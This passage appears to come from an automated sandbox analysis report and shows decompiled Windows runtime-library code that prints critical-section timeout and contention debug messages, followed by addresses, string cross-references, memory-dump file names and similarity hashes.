                                                                        				_t7 = E047DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                        				_push(_t13);
                                                                        				E04825720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                        				_t9 =  *_t15;
                                                                        				if(_t9 == 0xffffffff) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                        				}
                                                                        				_push(_t10);
                                                                        				_push(_t15);
                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                        				return E04825720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                        			}










                                                                        0x0482fdda
                                                                        0x0482fde2
                                                                        0x0482fde5
                                                                        0x0482fdec
                                                                        0x0482fdfa
                                                                        0x0482fdff
                                                                        0x0482fe0a
                                                                        0x0482fe0f
                                                                        0x0482fe17
                                                                        0x0482fe1e
                                                                        0x0482fe19
                                                                        0x0482fe19
                                                                        0x0482fe19
                                                                        0x0482fe20
                                                                        0x0482fe21
                                                                        0x0482fe22
                                                                        0x0482fe25
                                                                        0x0482fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0482FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0482FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0482FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
                                                                        • Instruction ID: 79bd3b15a49be9ca22ac49a47f16a2d8fa736ba6c1ebc99c6713af0951a936a1
                                                                        • Opcode Fuzzy Hash: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
                                                                        • Instruction Fuzzy Hash: D1F04C766801007FE6211A45CD01F337F6ADB40730F140305F714951D1EAA2FC60D6F4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%